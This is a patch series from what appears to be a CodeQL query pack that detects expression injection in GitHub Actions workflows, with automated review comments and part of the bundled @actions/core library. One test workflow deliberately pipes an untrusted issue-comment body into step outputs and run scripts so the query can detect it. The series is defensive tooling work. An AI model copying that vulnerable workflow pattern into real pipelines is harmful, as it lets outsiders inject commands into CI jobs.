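Review bot: The first disjunct of the new `allowImplicitRead` override, `allowImplicitRead(node, set)`, is a call to the predicate being defined rather than to a default implementation, so it is a self-recursive disjunct that adds nothing to the result and reads like a leftover from a copied template. Drop it and keep only `isSink(node) and set instanceof DataFlow::FieldContent`. A one-line comment saying why the sink needs an implicit field read (presumably so a value stored into the outputs by `fieldStoreStep` still reaches the output expression) would make the intent checkable.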
@@ -34,11 +29,9 @@ class AdditionalTaintStep extends Unit { * env: * BODY: ${{ github.event.comment.body }} * run: | - * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - * echo "Cleaned Initial URL: $INITIAL_URL" - * echo "::set-output name=initial_url::$INITIAL_URL" - * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT - * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | @@ -51,8 +44,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and - // TODO: repalce script with line below - script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r ) diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4b47a154a1d8..99779d6cc907 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -37,5 +37,4 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + - " }}, which may be controlled by an external user." + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 9ebb7bbf2bea..c8a30dad2944 100644 
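Review bot: `line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0` is a raw substring test, so an env var `URL` also matches `$URL_BASE` or `${URLS}`, and the `> 0` silently drops a match at column 0; both make this step less precise than the commit message claims. A bounded match such as `line.regexpMatch(".*\\$(\\{|ENV\\{)?" + varName + "(\\}|\\b).*")` (or `indexOf(...) >= 0` plus a boundary check) would fix both. The switch from `script` to `line` also stops taint the moment the variable is first assigned to another shell variable, which is the trade-off the commit message describes, so a `// NOTE: only lines that write $VAR directly to the output are tracked; intermediate variables are deliberately not followed` comment at this line would keep the next reader from re-widening it without noticing. The predicate starts in the previous hunk and its closing brace is outside this one.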
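Review bot: The new alert message, `Potential expression injection, which may be controlled by an external user.`, no longer tells the reader which expression is injected, which was the one actionable part of the old text. If the `.(CtxAccessExpr)` cast was dropped because sinks are no longer always `CtxAccessExpr` (a failing cast yields no message and silently drops the alert), a `$@` placeholder bound to the source keeps the reference without the cast: `"Potential expression injection from $@, which may be controlled by an external user.", source.getNode(), source.getNode().toString()`.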
--- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -17,41 +17,21 @@ jobs: env: BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" + echo "::set-output name=initial_url::$BODY" - name: Get Redirected URL with Debugging id: curl env: INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - + echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT - name: Trim URL after PNG id: trim-url env: REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" + echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" From 499c3e7ac3f152b224268752870fa9369b151187 Mon Sep 17 00:00:00 2001 
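Review bot: The trimmed fixture deletes the only step that assigned the tainted env var to an intermediate shell variable before writing the output (`INITIAL_URL=$(echo "$BODY" | grep ...)` followed by `::set-output name=initial_url::$INITIAL_URL`), which is exactly the shape this commit stops detecting. Keeping that step next to the new direct `$BODY` one, with a comment such as `# NOTE: intermediate variable - intentionally not tracked by runEnvToScriptStoreStep`, would pin the precision trade-off in a test instead of hiding it. The first step on the new side still uses the legacy `::set-output` form; a comment saying it is there to exercise the set-output regex would make that deliberate rather than accidental.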
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 12:03:06 +0100 Subject: [PATCH 036/707] Improve regexs --- ql/lib/codeql/actions/Ast.qll | 16 +++++++++++----- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e5f9e35a4a9b..b04694ed5689 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -355,15 +355,21 @@ class CtxAccessExpr extends ExprAccessExpr { abstract Expression getRefExpr(); } -private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string stepsCtxRegex() { + result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string needsCtxRegex() { + result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string jobsCtxRegex() { + result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } +private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } +private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } /** * Holds for an expression accesing the `steps` context. diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2b35b2f332f0..09094f2c580c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
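Review bot: The leading `\\b` added to these regexes does not stop a match after a `.`, because a dot followed by a letter is itself a word boundary, so `inputsCtxRegex()` still matches the tail of a longer context path such as `github.event.inputs.name`, and the same holds for `env.`, `steps.`, `needs.` and `jobs.` after any dot. If the intent is to match only the top-level context, a negative lookbehind is the tighter guard, e.g. `result = "(?<![\\w.])inputs\\.([A-Za-z0-9_-]+)\\b"`. Note also that the name class `[A-Za-z0-9_-]+` includes `-`, which is not a word character, so the trailing `\\b` cannot follow a name ending in `-` and the greedy class will back off to the last alphanumeric; harmless for valid identifiers, but worth a comment since it is easy to misread as a full-token anchor. The `CtxAccessExpr` class named in the hunk header starts outside the hunk.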
@@ -137,7 +137,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { } /** - * Composite action input sources + * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionStmt c; From 0105d63a4423368d25be3249a88432b2fe233a8e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:25:23 +0100 Subject: [PATCH 037/707] Add Action to scan repos --- .github/action/.gitignore | 1 + .github/action/dist/index.js | 30712 +++++++++++++++++++++++++++++ .github/action/dist/licenses.txt | 175 + .github/action/package-lock.json | 639 + .github/action/package.json | 48 + .github/action/src/codeql.ts | 158 + .github/action/src/index.ts | 61 + .github/action/tsconfig.json | 24 + .github/workflows/build.yml | 30 + action.yml | 19 + ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 12 files changed, 31869 insertions(+), 2 deletions(-) create mode 100644 .github/action/.gitignore create mode 100644 .github/action/dist/index.js create mode 100644 .github/action/dist/licenses.txt create mode 100644 .github/action/package-lock.json create mode 100644 .github/action/package.json create mode 100644 .github/action/src/codeql.ts create mode 100644 .github/action/src/index.ts create mode 100644 .github/action/tsconfig.json create mode 100644 .github/workflows/build.yml create mode 100644 action.yml diff --git a/.github/action/.gitignore b/.github/action/.gitignore new file mode 100644 index 000000000000..c2658d7d1b31 --- /dev/null +++ b/.github/action/.gitignore @@ -0,0 +1 @@ +node_modules/ diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js new file mode 100644 index 000000000000..e13da63ecdad --- /dev/null +++ b/.github/action/dist/index.js 
@@ -0,0 +1,30712 @@ +/******/ (() => { // webpackBootstrap +/******/ var __webpack_modules__ = ({ + +/***/ 7351: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.issue = exports.issueCommand = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const utils_1 = __nccwpck_require__(5278); +/** + * Commands + * + * Command Format: + * ::name key=value,key=value::message + * + * Examples: + * ::warning::This is the message + * ::set-env name=MY_VAR::some value + */ +function issueCommand(command, properties, message) { + const cmd = new Command(command, properties, message); + process.stdout.write(cmd.toString() + os.EOL); +} +exports.issueCommand = issueCommand; +function issue(name, message = '') { + issueCommand(name, {}, message); +} +exports.issue = issue; +const CMD_STRING = '::'; +class Command { + constructor(command, properties, message) { + if (!command) { + command = 'missing.command'; + } + this.command = command; + this.properties = properties; + this.message = message; + } + toString() { + let cmdStr = 
CMD_STRING + this.command; + if (this.properties && Object.keys(this.properties).length > 0) { + cmdStr += ' '; + let first = true; + for (const key in this.properties) { + if (this.properties.hasOwnProperty(key)) { + const val = this.properties[key]; + if (val) { + if (first) { + first = false; + } + else { + cmdStr += ','; + } + cmdStr += `${key}=${escapeProperty(val)}`; + } + } + } + } + cmdStr += `${CMD_STRING}${escapeData(this.message)}`; + return cmdStr; + } +} +function escapeData(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A'); +} +function escapeProperty(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A') + .replace(/:/g, '%3A') + .replace(/,/g, '%2C'); +} +//# sourceMappingURL=command.js.map + +/***/ }), + +/***/ 2186: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; +const command_1 = __nccwpck_require__(7351); +const file_command_1 = __nccwpck_require__(717); +const utils_1 = __nccwpck_require__(5278); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const oidc_utils_1 = __nccwpck_require__(8041); +/** + * The code to exit an action + */ +var ExitCode; +(function (ExitCode) { + /** + * A code indicating that the action was successful + */ + ExitCode[ExitCode["Success"] = 0] = "Success"; + /** + * A code indicating that the action was a failure + */ + ExitCode[ExitCode["Failure"] = 1] = "Failure"; +})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); +//----------------------------------------------------------------------- +// Variables +//----------------------------------------------------------------------- +/** + * Sets env variable for this action and future actions in the job + * @param name the name of the variable to set + * @param val the value of the 
variable. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function exportVariable(name, val) { + const convertedVal = utils_1.toCommandValue(val); + process.env[name] = convertedVal; + const filePath = process.env['GITHUB_ENV'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); + } + command_1.issueCommand('set-env', { name }, convertedVal); +} +exports.exportVariable = exportVariable; +/** + * Registers a secret which will get masked from logs + * @param secret value of the secret + */ +function setSecret(secret) { + command_1.issueCommand('add-mask', {}, secret); +} +exports.setSecret = setSecret; +/** + * Prepends inputPath to the PATH (for this action and future actions) + * @param inputPath + */ +function addPath(inputPath) { + const filePath = process.env['GITHUB_PATH'] || ''; + if (filePath) { + file_command_1.issueFileCommand('PATH', inputPath); + } + else { + command_1.issueCommand('add-path', {}, inputPath); + } + process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; +} +exports.addPath = addPath; +/** + * Gets the value of an input. + * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. + * Returns an empty string if the value is not defined. + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string + */ +function getInput(name, options) { + const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; + if (options && options.required && !val) { + throw new Error(`Input required and not supplied: ${name}`); + } + if (options && options.trimWhitespace === false) { + return val; + } + return val.trim(); +} +exports.getInput = getInput; +/** + * Gets the values of an multiline input. Each value is also trimmed. 
+ * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string[] + * + */ +function getMultilineInput(name, options) { + const inputs = getInput(name, options) + .split('\n') + .filter(x => x !== ''); + if (options && options.trimWhitespace === false) { + return inputs; + } + return inputs.map(input => input.trim()); +} +exports.getMultilineInput = getMultilineInput; +/** + * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. + * Support boolean input list: `true | True | TRUE | false | False | FALSE` . + * The return value is also in boolean type. + * ref: https://yaml.org/spec/1.2/spec.html#id2804923 + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns boolean + */ +function getBooleanInput(name, options) { + const trueValue = ['true', 'True', 'TRUE']; + const falseValue = ['false', 'False', 'FALSE']; + const val = getInput(name, options); + if (trueValue.includes(val)) + return true; + if (falseValue.includes(val)) + return false; + throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + + `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); +} +exports.getBooleanInput = getBooleanInput; +/** + * Sets the value of an output. + * + * @param name name of the output to set + * @param value value to store. 
Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function setOutput(name, value) { + const filePath = process.env['GITHUB_OUTPUT'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); + } + process.stdout.write(os.EOL); + command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); +} +exports.setOutput = setOutput; +/** + * Enables or disables the echoing of commands into stdout for the rest of the step. + * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. + * + */ +function setCommandEcho(enabled) { + command_1.issue('echo', enabled ? 'on' : 'off'); +} +exports.setCommandEcho = setCommandEcho; +//----------------------------------------------------------------------- +// Results +//----------------------------------------------------------------------- +/** + * Sets the action status to failed. + * When the action exits it will be with an exit code of 1 + * @param message add error issue message + */ +function setFailed(message) { + process.exitCode = ExitCode.Failure; + error(message); +} +exports.setFailed = setFailed; +//----------------------------------------------------------------------- +// Logging Commands +//----------------------------------------------------------------------- +/** + * Gets whether Actions Step Debug is on or not + */ +function isDebug() { + return process.env['RUNNER_DEBUG'] === '1'; +} +exports.isDebug = isDebug; +/** + * Writes debug message to user log + * @param message debug message + */ +function debug(message) { + command_1.issueCommand('debug', {}, message); +} +exports.debug = debug; +/** + * Adds an error issue + * @param message error issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. 
+ */ +function error(message, properties = {}) { + command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.error = error; +/** + * Adds a warning issue + * @param message warning issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function warning(message, properties = {}) { + command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.warning = warning; +/** + * Adds a notice issue + * @param message notice issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function notice(message, properties = {}) { + command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.notice = notice; +/** + * Writes info to log with console.log. + * @param message info message + */ +function info(message) { + process.stdout.write(message + os.EOL); +} +exports.info = info; +/** + * Begin an output group. + * + * Output until the next `groupEnd` will be foldable in this group + * + * @param name The name of the output group + */ +function startGroup(name) { + command_1.issue('group', name); +} +exports.startGroup = startGroup; +/** + * End an output group. + */ +function endGroup() { + command_1.issue('endgroup'); +} +exports.endGroup = endGroup; +/** + * Wrap an asynchronous function call in a group. + * + * Returns the same type as the function itself. 
+ * + * @param name The name of the group + * @param fn The function to wrap in the group + */ +function group(name, fn) { + return __awaiter(this, void 0, void 0, function* () { + startGroup(name); + let result; + try { + result = yield fn(); + } + finally { + endGroup(); + } + return result; + }); +} +exports.group = group; +//----------------------------------------------------------------------- +// Wrapper action state +//----------------------------------------------------------------------- +/** + * Saves state for current action, the state can only be retrieved by this action's post job execution. + * + * @param name name of the state to store + * @param value value to store. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function saveState(name, value) { + const filePath = process.env['GITHUB_STATE'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); + } + command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); +} +exports.saveState = saveState; +/** + * Gets the value of an state set by this action's main execution. 
+ * + * @param name name of the state to get + * @returns string + */ +function getState(name) { + return process.env[`STATE_${name}`] || ''; +} +exports.getState = getState; +function getIDToken(aud) { + return __awaiter(this, void 0, void 0, function* () { + return yield oidc_utils_1.OidcClient.getIDToken(aud); + }); +} +exports.getIDToken = getIDToken; +/** + * Summary exports + */ +var summary_1 = __nccwpck_require__(1327); +Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); +/** + * @deprecated use core.summary + */ +var summary_2 = __nccwpck_require__(1327); +Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); +/** + * Path exports + */ +var path_utils_1 = __nccwpck_require__(2981); +Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); +Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); +Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); +//# sourceMappingURL=core.js.map + +/***/ }), + +/***/ 717: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +// For internal use, subject to change. +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +const fs = __importStar(__nccwpck_require__(7147)); +const os = __importStar(__nccwpck_require__(2037)); +const uuid_1 = __nccwpck_require__(5840); +const utils_1 = __nccwpck_require__(5278); +function issueFileCommand(command, message) { + const filePath = process.env[`GITHUB_${command}`]; + if (!filePath) { + throw new Error(`Unable to find environment variable for file command ${command}`); + } + if (!fs.existsSync(filePath)) { + throw new Error(`Missing file at path: ${filePath}`); + } + fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { + encoding: 'utf8' + }); +} +exports.issueFileCommand = issueFileCommand; +function prepareKeyValueMessage(key, value) { + const delimiter = `ghadelimiter_${uuid_1.v4()}`; + const convertedValue = utils_1.toCommandValue(value); + // These should realistically never happen, but just in case someone finds a + // way to exploit uuid generation let's not allow keys or values that contain + // the delimiter. 
+ if (key.includes(delimiter)) { + throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); + } + if (convertedValue.includes(delimiter)) { + throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); + } + return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; +} +exports.prepareKeyValueMessage = prepareKeyValueMessage; +//# sourceMappingURL=file-command.js.map + +/***/ }), + +/***/ 8041: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.OidcClient = void 0; +const http_client_1 = __nccwpck_require__(6255); +const auth_1 = __nccwpck_require__(5526); +const core_1 = __nccwpck_require__(2186); +class OidcClient { + static createHttpClient(allowRetry = true, maxRetry = 10) { + const requestOptions = { + allowRetries: allowRetry, + maxRetries: maxRetry + }; + return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); + } + static getRequestToken() { + const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; + if (!token) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); + } + return token; + } + static getIDTokenUrl() { + const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; + if (!runtimeUrl) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); + } + return runtimeUrl; + } + static getCall(id_token_url) { + var _a; + return __awaiter(this, void 0, void 0, function* () { + const httpclient = OidcClient.createHttpClient(); + const res = yield httpclient + .getJson(id_token_url) + .catch(error => { + throw new Error(`Failed to get ID Token. \n + Error Code : ${error.statusCode}\n + Error Message: ${error.message}`); + }); + const id_token = (_a = res.result) === null || _a === void 0 ? 
void 0 : _a.value; + if (!id_token) { + throw new Error('Response json body do not have ID Token field'); + } + return id_token; + }); + } + static getIDToken(audience) { + return __awaiter(this, void 0, void 0, function* () { + try { + // New ID Token is requested from action service + let id_token_url = OidcClient.getIDTokenUrl(); + if (audience) { + const encodedAudience = encodeURIComponent(audience); + id_token_url = `${id_token_url}&audience=${encodedAudience}`; + } + core_1.debug(`ID token url is ${id_token_url}`); + const id_token = yield OidcClient.getCall(id_token_url); + core_1.setSecret(id_token); + return id_token; + } + catch (error) { + throw new Error(`Error message: ${error.message}`); + } + }); + } +} +exports.OidcClient = OidcClient; +//# sourceMappingURL=oidc-utils.js.map + +/***/ }), + +/***/ 2981: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; +const path = __importStar(__nccwpck_require__(1017)); +/** + * toPosixPath converts the given path to the posix form. On Windows, \\ will be + * replaced with /. + * + * @param pth. Path to transform. + * @return string Posix path. + */ +function toPosixPath(pth) { + return pth.replace(/[\\]/g, '/'); +} +exports.toPosixPath = toPosixPath; +/** + * toWin32Path converts the given path to the win32 form. On Linux, / will be + * replaced with \\. + * + * @param pth. Path to transform. + * @return string Win32 path. + */ +function toWin32Path(pth) { + return pth.replace(/[/]/g, '\\'); +} +exports.toWin32Path = toWin32Path; +/** + * toPlatformPath converts the given path to a platform-specific path. It does + * this by replacing instances of / and \ with the platform-specific path + * separator. + * + * @param pth The path to platformize. + * @return string The platform-specific path. + */ +function toPlatformPath(pth) { + return pth.replace(/[/\\]/g, path.sep); +} +exports.toPlatformPath = toPlatformPath; +//# sourceMappingURL=path-utils.js.map + +/***/ }), + +/***/ 1327: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
